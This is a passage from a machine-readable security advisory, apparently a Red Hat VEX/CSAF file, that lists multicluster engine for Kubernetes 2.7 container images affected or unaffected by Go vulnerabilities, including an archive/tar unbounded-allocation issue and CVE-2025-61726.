"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
